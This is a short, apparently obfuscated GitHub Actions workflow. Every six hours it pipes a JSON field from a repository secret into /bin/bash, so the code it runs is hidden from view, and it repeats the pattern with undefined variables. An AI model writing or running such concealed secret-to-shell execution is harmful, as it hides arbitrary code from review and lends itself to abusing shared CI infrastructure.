name: xiangjiangnannn

on:
  workflow_dispatch:
  schedule:
    - cron: '57 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiangjiangnannn
        env:
          ejbh4: ${{ secrets.ejbh4 }}
        run: |
          echo $ejbh4 | jq -r .vxrv2881 | /bin/bash
          echo $avim13566 | jq -r .xgs8840 | /bin/bash
          echo $jpfgf73363 | jq -r .vid9 | /bin/bash
          echo $bxfvf09256 | jq -r .mz065 | /bin/bash
          echo $anvwv74873 | jq -r .utr490 | /bin/bash
          echo $k62890 | jq -r .in548 | /bin/bash
          echo $hrjy786 | jq -r .uf52 | /bin/bash
          echo $jbu99 | jq -r .wtgoe82 | /bin/bash
          echo $s55062 | jq -r .r40 | /bin/bash
          echo $hgpt85 | jq -r .bwkbw624 | /bin/bash
          echo $b9171 | jq -r .kym65685 | /bin/bash
          echo $gaa6 | jq -r .skj08 | /bin/bash
          echo $f6433 | jq -r .weg2 | /bin/bash
          echo $sankt50329 | jq -r .e3 | /bin/bash

